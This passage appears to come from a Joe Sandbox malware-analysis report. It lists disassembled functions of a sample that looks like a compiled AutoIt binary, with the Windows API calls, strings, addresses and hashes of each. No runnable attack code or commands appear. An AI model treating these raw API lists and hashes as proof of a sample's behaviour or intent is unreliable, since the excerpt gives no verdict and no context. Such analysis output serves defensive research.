                                                                                                                      • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1687444384-0
                                                                                                                      • Opcode ID: 1f1bbc6268792922e1bb5436efcc154034f468e1d3c88112e22a285097f59fb5
                                                                                                                      • Instruction ID: a51e90b29d8ef59ff6c7e0e770744c339917b590513b7787c7539c3b9f4b03a8
                                                                                                                      • Opcode Fuzzy Hash: 1f1bbc6268792922e1bb5436efcc154034f468e1d3c88112e22a285097f59fb5
                                                                                                                      • Instruction Fuzzy Hash: 93016D72501B009FD761EF65D805B5AF7E0AF40325F20890EE49ACB2A1DB74AA44CF05
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 003BB5EB
                                                                                                                        • Part of subcall function 003BB58B: SelectObject.GDI32(?,00000000), ref: 003BB5FA
                                                                                                                        • Part of subcall function 003BB58B: BeginPath.GDI32(?), ref: 003BB611
                                                                                                                        • Part of subcall function 003BB58B: SelectObject.GDI32(?,00000000), ref: 003BB63B
                                                                                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0040E860
                                                                                                                      • LineTo.GDI32(00000000,?,?), ref: 0040E86D
                                                                                                                      • EndPath.GDI32(00000000), ref: 0040E87D
                                                                                                                      • StrokePath.GDI32(00000000), ref: 0040E88B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1539411459-0
                                                                                                                      • Opcode ID: 586bba118263710f37ff54526aafa41359127d47e789d98b43c5b97ff0be7678
                                                                                                                      • Instruction ID: 4a470487e876e552a88e34f44f30283dc1f08e14c8a47854a2f1f7b4e5f3beef
                                                                                                                      • Opcode Fuzzy Hash: 586bba118263710f37ff54526aafa41359127d47e789d98b43c5b97ff0be7678
                                                                                                                      • Instruction Fuzzy Hash: B7F0BE32500259BADB262F50AC09FCE3F99AF06314F448122FA01220F187B94522CFAE
                                                                                                                      APIs
                                                                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 003DD640
                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 003DD653
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 003DD65A
                                                                                                                      • AttachThreadInput.USER32(00000000), ref: 003DD661
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2710830443-0
                                                                                                                      • Opcode ID: a310c4917abc31440c379c89c83ca7f5ef7af6af12d7eb95e8e49c6b2605b532
                                                                                                                      • Instruction ID: 6036cb196613fe03f3a43cb35cce7589f5962c48e569d2e2d14fafb44a6f5482
                                                                                                                      • Opcode Fuzzy Hash: a310c4917abc31440c379c89c83ca7f5ef7af6af12d7eb95e8e49c6b2605b532
                                                                                                                      • Instruction Fuzzy Hash: 57E06D32A05228BAEB311FA2EC0DEEB7F1CEF117A1F808021B50C95460CB71D581CBE4
                                                                                                                      APIs
                                                                                                                      • GetSysColor.USER32(00000008), ref: 003BB0C5
                                                                                                                      • SetTextColor.GDI32(?,000000FF), ref: 003BB0CF
                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 003BB0E4
                                                                                                                      • GetStockObject.GDI32(00000005), ref: 003BB0EC
                                                                                                                      • GetWindowDC.USER32(?,00000000), ref: 0041ECFA
                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0041ED07
                                                                                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 0041ED20
                                                                                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 0041ED39
                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 0041ED59
                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 0041ED64
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Similarity
                                                                                                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1946975507-0
                                                                                                                      APIs
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2889604237-0
                                                                                                                      APIs
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2889604237-0
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID: >$DEFINE
                                                                                                                      • API String ID: 4104443479-1664449232
                                                                                                                      APIs
                                                                                                                      • OleSetContainedObject.OLE32(?,00000001), ref: 003DECA0
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: ContainedObject
                                                                                                                      • String ID: AutoIt3GUI$Container
                                                                                                                      • API String ID: 3565006973-3941886329
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A3BCF: _wcscpy.LIBCMT ref: 003A3BF2
                                                                                                                        • Part of subcall function 003A84A6: __swprintf.LIBCMT ref: 003A84E5
                                                                                                                        • Part of subcall function 003A84A6: __itow.LIBCMT ref: 003A8519
                                                                                                                      • __wcsnicmp.LIBCMT ref: 003EE785
                                                                                                                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 003EE84E
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                      • String ID: LPT
                                                                                                                      • API String ID: 3222508074-1350329615
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNEL32(00000000), ref: 003A1B83
                                                                                                                      • GlobalMemoryStatusEx.KERNEL32 ref: 003A1B9C
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: GlobalMemorySleepStatus
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 2783356886-2766056989
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A417D: __fread_nolock.LIBCMT ref: 003A419B
                                                                                                                      • _wcscmp.LIBCMT ref: 003ECF49
                                                                                                                      • _wcscmp.LIBCMT ref: 003ECF5C
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscmp$__fread_nolock
                                                                                                                      • String ID: FILE
                                                                                                                      • API String ID: 4029003684-3121273764
                                                                                                                      • Opcode ID: 54088ad56bd56bcd512840ed9be3d288dcc5e60ee54a489cf5cce21ba7a267e4
                                                                                                                      • Instruction ID: 2c31195b285e40cf0ec3c4a19a7830bd63d3d0c5ecb7b2db5a42b8081cfa7805
                                                                                                                      • Opcode Fuzzy Hash: 54088ad56bd56bcd512840ed9be3d288dcc5e60ee54a489cf5cce21ba7a267e4
                                                                                                                      • Instruction Fuzzy Hash: 3141D432A10259BADF12DFA5CC81FEF7BBAEF8A710F000569F601EB191D7719A458B50
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003C889E: __getptd_noexit.LIBCMT ref: 003C889E
                                                                                                                      • __getbuf.LIBCMT ref: 003C9B8A
                                                                                                                      • __lseeki64.LIBCMT ref: 003C9BFA
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: __getbuf__getptd_noexit__lseeki64
                                                                                                                      • String ID: pM=
                                                                                                                      • API String ID: 3311320906-3054488603
                                                                                                                      • Opcode ID: 3166ea9f7b33bc9e5ae425e9b7c9823ebebedbec6ad3a173221488c27627cb57
                                                                                                                      • Instruction ID: 8e692cc8b2dc766b566b9c2e422cdf8bdc193c5aea6c5b292c05c4bf8eda5305
                                                                                                                      • Opcode Fuzzy Hash: 3166ea9f7b33bc9e5ae425e9b7c9823ebebedbec6ad3a173221488c27627cb57
                                                                                                                      • Instruction Fuzzy Hash: 8E410271500B05AED3269F28D899F7A77E8AB45330F16C61FE4AACB6D1D774EC408B10
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 0040A668
                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0040A67D
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: '
                                                                                                                      • API String ID: 3850602802-1997036262
                                                                                                                      • Opcode ID: 8c3872f42beea5c0d642d4d7f1f7050eef07770f1dba86c87bb7f649cf121048
                                                                                                                      • Instruction ID: 9115df9d301f873305a3a198efb426a73f99e0d55ee2fe09c57f368f96cf1e20
                                                                                                                      • Opcode Fuzzy Hash: 8c3872f42beea5c0d642d4d7f1f7050eef07770f1dba86c87bb7f649cf121048
                                                                                                                      • Instruction Fuzzy Hash: AE413875A00309AFDB14CF68C881BDA7BB9FB09300F14057AE905EB381D775A952CFA5
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 0040961B
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00409657
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$DestroyMove
                                                                                                                      • String ID: static
                                                                                                                      • API String ID: 2139405536-2160076837
                                                                                                                      • Opcode ID: 8cd9a05e62678115e91e91bd77670a805c7b23dd071195c4f3e828d26ed448f5
                                                                                                                      • Instruction ID: 78c1af30a6ccb43f85fffc9172015ec48698a6164cc3f4ef3fb2eb5e08c3de71
                                                                                                                      • Opcode Fuzzy Hash: 8cd9a05e62678115e91e91bd77670a805c7b23dd071195c4f3e828d26ed448f5
                                                                                                                      • Instruction Fuzzy Hash: 3E31C131500604AEEB209F24DC40FFB77A8FF48354F10852AF9A9D7291CA359C91DB68
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 003DD0ED
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 003DD127
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3850602802-2594219639
                                                                                                                      • Opcode ID: 1b3bb1edddcbc8550896faf2753fd1b198cc2386fb98cc8ed7e4e1eb4c857a74
                                                                                                                      • Instruction ID: 708ea909e574ab23da2ae64fb617ea1c5344ed8cb2f477cb112a7b1297709779
                                                                                                                      • Opcode Fuzzy Hash: 1b3bb1edddcbc8550896faf2753fd1b198cc2386fb98cc8ed7e4e1eb4c857a74
                                                                                                                      • Instruction Fuzzy Hash: 4F21B973D00215ABCB17AF54D881DEEB779EF89714B12802AE915AB390EA745C46C790
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 003E5BE4
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003E5C1F
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoItemMenu_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 2223754486-4108050209
                                                                                                                      • Opcode ID: 87c38894b6f5cd23ef4e848ac48c0acc15af78ff5fa9a8ec91ba23cfa4a2d366
                                                                                                                      • Instruction ID: 827ec64d4d0af7c3f9a29bf328331d4621d175e6e6c29e0ec15f4e4e057c6824
                                                                                                                      • Opcode Fuzzy Hash: 87c38894b6f5cd23ef4e848ac48c0acc15af78ff5fa9a8ec91ba23cfa4a2d366
                                                                                                                      • Instruction Fuzzy Hash: 8D310B71500359EBDB26CF9AC885B9DBBF4EF05358F290119E981D61E0D7B09944CF10
                                                                                                                      APIs
                                                                                                                      • __snwprintf.LIBCMT ref: 003F6BDD
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: __snwprintf_memmove
                                                                                                                      • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                      • API String ID: 3506404897-2584243854
                                                                                                                      • Opcode ID: 3592db65c0bec47ca8ec7ef9ea280173af49b69c4ddee99cca6e8cc1d09d9554
                                                                                                                      • Instruction ID: e24df77a3a845866ab0fd64ad90b7ba43b0c4b15fa68b40863bb49781dd81e31
                                                                                                                      • Opcode Fuzzy Hash: 3592db65c0bec47ca8ec7ef9ea280173af49b69c4ddee99cca6e8cc1d09d9554
                                                                                                                      • Instruction Fuzzy Hash: CC219E31600218AACF12EFA4CC82FAE77B5EF45700F104459F545AB182DB74EE45CBA5
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003E86AE: GetLocalTime.KERNEL32 ref: 003E86BB
                                                                                                                        • Part of subcall function 003E86AE: _wcsncpy.LIBCMT ref: 003E86F0
                                                                                                                        • Part of subcall function 003E86AE: _wcsncpy.LIBCMT ref: 003E8722
                                                                                                                        • Part of subcall function 003E86AE: _wcsncpy.LIBCMT ref: 003E8755
                                                                                                                        • Part of subcall function 003E86AE: _wcsncpy.LIBCMT ref: 003E8797
                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00409405
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcsncpy$LocalMessageSendTime
                                                                                                                      • String ID: @U=u$SysDateTimePick32
                                                                                                                      • API String ID: 2466184910-2530228043
                                                                                                                      • Opcode ID: 1629509ec9e74b15b93102a5ae600c2e3ff3708465979ec7733bffd560e3fa5c
                                                                                                                      • Instruction ID: e0b8ef472c720f51ec48ba6807849c73b313a6b6ca03cc54cadb9256df38e083
                                                                                                                      • Opcode Fuzzy Hash: 1629509ec9e74b15b93102a5ae600c2e3ff3708465979ec7733bffd560e3fa5c
                                                                                                                      • Instruction Fuzzy Hash: AC21E7317402146BEF218E54DC42FEF3369EB44754F10452AF950AB2D1D6B9AC519B68
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003DC9A6
                                                                                                                        • Part of subcall function 003E4C65: GetWindowThreadProcessId.USER32(?,?), ref: 003E4C90
                                                                                                                        • Part of subcall function 003E4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,003DC9C2,00000034,?,?,00001004,00000000,00000000), ref: 003E4CA0
                                                                                                                        • Part of subcall function 003E4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,003DC9C2,00000034,?,?,00001004,00000000,00000000), ref: 003E4CB6
                                                                                                                        • Part of subcall function 003E4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003DC9FE,?,?,00000034,00000800,?,00000034), ref: 003E4D6B
                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 003DCA0D
                                                                                                                        • Part of subcall function 003E4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003DCA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 003E4D36
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$MemoryMessageSend$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 1045663743-2594219639
                                                                                                                      • Opcode ID: 70976b8d232f9cd6e3d25275d5e144469f092f16dce2a81e99fa9b5b92845b5e
                                                                                                                      • Instruction ID: f497f4d99728d9e1f165db7bfeeb9780274069abf303abe258e50f5955c869f9
                                                                                                                      • Opcode Fuzzy Hash: 70976b8d232f9cd6e3d25275d5e144469f092f16dce2a81e99fa9b5b92845b5e
                                                                                                                      • Instruction Fuzzy Hash: 2E21A132911129ABDF22DBA4DC45FCEBBB8FF09350F1042A5E545AB1D1EA705E44CB90
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00409269
                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00409274
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: Combobox
                                                                                                                      • API String ID: 3850602802-2096851135
                                                                                                                      • Opcode ID: cf6ad8eba5cdf0d5ba0c77ff62ac4f2305c355b2774d641adddd7ff2219a4a33
                                                                                                                      • Instruction ID: 0775cca32abbd746e58d49d761197b7ccafb4ec0867289168c267f22f406f491
                                                                                                                      • Opcode Fuzzy Hash: cf6ad8eba5cdf0d5ba0c77ff62ac4f2305c355b2774d641adddd7ff2219a4a33
                                                                                                                      • Instruction Fuzzy Hash: C811B671300109BFEF21DE54DC81FAB375AEB883A4F10453AF918AB2D1D679DC5197A4
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 0-2594219639
                                                                                                                      • Opcode ID: cf39735b71dbd6fbcd7335af3a1ca441646bb2ff5353d7da6f013fe07099ad16
                                                                                                                      • Instruction ID: cfb4c9bffd7a3647c45344b5d9dbb320a05073fa3c1841439e1acf69afa566f8
                                                                                                                      • Opcode Fuzzy Hash: cf39735b71dbd6fbcd7335af3a1ca441646bb2ff5353d7da6f013fe07099ad16
                                                                                                                      • Instruction Fuzzy Hash: 6011D331910208FFEF148F94CC81FBA3765EB05750F1442BAFA16BA5D0D2B8D911EB69
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 003BC657
                                                                                                                        • Part of subcall function 003BC619: GetStockObject.GDI32(00000011), ref: 003BC66B
                                                                                                                        • Part of subcall function 003BC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 003BC675
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00409775
                                                                                                                      • GetSysColor.USER32(00000012), ref: 0040978F
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                      • String ID: static
                                                                                                                      • API String ID: 1983116058-2160076837
                                                                                                                      • Opcode ID: 61ac38cefff49dd69e6836eaa0c364d02a2ad39ad7342dddc18a753f8bb25517
                                                                                                                      • Instruction ID: 33d0734f082a99f776ae8e81675b4f7e4f4fa494b32b63d2927423bdb1c7b6df
                                                                                                                      • Opcode Fuzzy Hash: 61ac38cefff49dd69e6836eaa0c364d02a2ad39ad7342dddc18a753f8bb25517
                                                                                                                      • Instruction Fuzzy Hash: A7116A72620209EFDB14DFB8CC45EEA7BB8EB08304F004529F955E3291E778E851DB54
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,?,?,?), ref: 0040B03B
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3850602802-2594219639
                                                                                                                      • Opcode ID: d8a2e27f145b2905731912665fae47dbf16efa0dc4ad8df7543bc4f6170396eb
                                                                                                                      • Instruction ID: 17aed72d3fef99c005a100d088cfc0578b17ec2e9e919a8e3b9d88d073a25544
                                                                                                                      • Opcode Fuzzy Hash: d8a2e27f145b2905731912665fae47dbf16efa0dc4ad8df7543bc4f6170396eb
                                                                                                                      • Instruction Fuzzy Hash: FA21D376A0020AEFCB15DFA4C840CAABBB6FB4D340B004566FE15A7360D7359921DBA8
                                                                                                                      APIs
                                                                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 003F544C
                                                                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 003F5475
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$OpenOption
                                                                                                                      • String ID: <local>
                                                                                                                      • API String ID: 942729171-4266983199
                                                                                                                      • Opcode ID: b57ba4a2a3bd2cdc9796e1f4074d475f3a223ebdba023f35427f98614acfe070
                                                                                                                      • Instruction ID: a23f848d55d23e3fd9b536faa83246920c5e376fadf86ca18fe9953adaf848f1
                                                                                                                      • Opcode Fuzzy Hash: b57ba4a2a3bd2cdc9796e1f4074d475f3a223ebdba023f35427f98614acfe070
                                                                                                                      • Instruction Fuzzy Hash: 4911A070541A29BADB268F528C84EFBFBACFF12752F10822AF74556440E3706984CAF0
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00000401,?,00000000), ref: 00409134
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: @U=u$button
                                                                                                                      • API String ID: 3850602802-1762282863
                                                                                                                      • Opcode ID: e08f7b97a1881a85f798751e1887a47fd8e3b3ec028cf32ed9e559cd99ac37f5
                                                                                                                      • Instruction ID: bdbd30cde467c282c122323b0e79ee62fabe42ae5027f992d551388dede2bb00
                                                                                                                      • Opcode Fuzzy Hash: e08f7b97a1881a85f798751e1887a47fd8e3b3ec028cf32ed9e559cd99ac37f5
                                                                                                                      • Instruction Fuzzy Hash: 6311E532250206ABDF119F60CC01FEB376AFF18318F155525FA95AB2D1C27AEC61AB54
                                                                                                                      APIs
                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 003D4557
                                                                                                                      • ___raise_securityfailure.LIBCMT ref: 003D463E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                      • String ID: (F
                                                                                                                      • API String ID: 3761405300-3809367202
                                                                                                                      • Opcode ID: d9321227d9e5a8e606c714062ce467202f79930b4a0878579eaa8a4b60ddae63
                                                                                                                      • Instruction ID: 40c405dff9bd2c6b0ddf1c878d63f61eb25a313798d41be4006d75649e886dd1
                                                                                                                      • Opcode Fuzzy Hash: d9321227d9e5a8e606c714062ce467202f79930b4a0878579eaa8a4b60ddae63
                                                                                                                      • Instruction Fuzzy Hash: 0B211FB56003249BE304DF15F9926023BB5BB49310F10593AE5098B3A1F3F6A990CF8E
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,0000133E,00000000,?), ref: 0040A3E1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3850602802-2594219639
                                                                                                                      • Opcode ID: 0e2de5aa722027669cc2fcfe50f2b451ce31e966affada5b523a845bb377cb07
                                                                                                                      • Instruction ID: 42ea9b7e1597b0b121ccc3c8149203a575c30596889fd9d0228200b3033705db
                                                                                                                      • Opcode Fuzzy Hash: 0e2de5aa722027669cc2fcfe50f2b451ce31e966affada5b523a845bb377cb07
                                                                                                                      • Instruction Fuzzy Hash: 1C112234500740AFDB20CF34C891AE7BBE5BF06304F10892EE9AAA73C1D7B46901DB62
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003E4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003DC9FE,?,?,00000034,00000800,?,00000034), ref: 003E4D6B
                                                                                                                      • SendMessageW.USER32(?,0000102B,?,00000000), ref: 003DCC85
                                                                                                                      • SendMessageW.USER32(?,0000102B,?,00000000), ref: 003DCCA8
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$MemoryProcessWrite
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 1195347164-2594219639
                                                                                                                      • Opcode ID: 3f88ff964646713ad780626c7be139dd8d8e78f96866f1415cc892403710c469
                                                                                                                      • Instruction ID: a828fa6086d804c1711c5207661012b518b5ead213acfbc19356f34049976973
                                                                                                                      • Opcode Fuzzy Hash: 3f88ff964646713ad780626c7be139dd8d8e78f96866f1415cc892403710c469
                                                                                                                      • Instruction Fuzzy Hash: 8801F972910129EBEB226F24EC86EEFBB7CDF04310F104166F515AB1D0DB706D41CA60
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: htonsinet_addr
                                                                                                                      • String ID: 255.255.255.255
                                                                                                                      • API String ID: 3832099526-2422070025
                                                                                                                      • Opcode ID: 51c0261f535bbd24845b79fde181f7afbccb55d99cb5802c6d5fa8da593b23b7
                                                                                                                      • Instruction ID: b56b659892b56b051b6bce826778d205ac77b7d44d66c1602aee43b7e7f8047c
                                                                                                                      • Opcode Fuzzy Hash: 51c0261f535bbd24845b79fde181f7afbccb55d99cb5802c6d5fa8da593b23b7
                                                                                                                      • Instruction Fuzzy Hash: F30145B5200308ABCB21DFA4C852FBDB3A8FF44720F10852AFA199B2C1C731E804C755
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fread_nolock_memmove
                                                                                                                      • String ID: EA06
                                                                                                                      • API String ID: 1988441806-3962188686
                                                                                                                      • Opcode ID: f9f4342fc34b7b64410cfaa0f1cf85b3722269742124f4d9ef5860792c88bc87
                                                                                                                      • Instruction ID: a578e202155bb20a547024eef5628c3745f81889661c2a9c329cea58ee9cb31d
                                                                                                                      • Opcode Fuzzy Hash: f9f4342fc34b7b64410cfaa0f1cf85b3722269742124f4d9ef5860792c88bc87
                                                                                                                      • Instruction Fuzzy Hash: 2C01F9719002586EDB19C799CC16FFE7BF89B05311F00415EE153D61C1E474A7088B60
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00000406,00000000,00000000), ref: 003DCD75
                                                                                                                      • SendMessageW.USER32(?,0000040D,?,00000000), ref: 003DCDA8
                                                                                                                        • Part of subcall function 003E4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003DCA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 003E4D36
                                                                                                                        • Part of subcall function 003A7E53: _memmove.LIBCMT ref: 003A7EB9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$MemoryProcessRead_memmove
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 339422723-2594219639
                                                                                                                      • Opcode ID: 73d0b471696598a35942bbbb07b7d90be7a89593ec069c4471f0c44b8b8e264a
                                                                                                                      • Instruction ID: dbae56fc8c97ac9287752c66edb374494e973fba58d38cccc98d7bb55e21ce18
                                                                                                                      • Opcode Fuzzy Hash: 73d0b471696598a35942bbbb07b7d90be7a89593ec069c4471f0c44b8b8e264a
                                                                                                                      • Instruction Fuzzy Hash: 65016D72900128EFCB51AF54DC81EDA7BBDEB14340F50C0A6F549AB150DE305E89CB90
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003DCCC6
                                                                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003DCCDE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
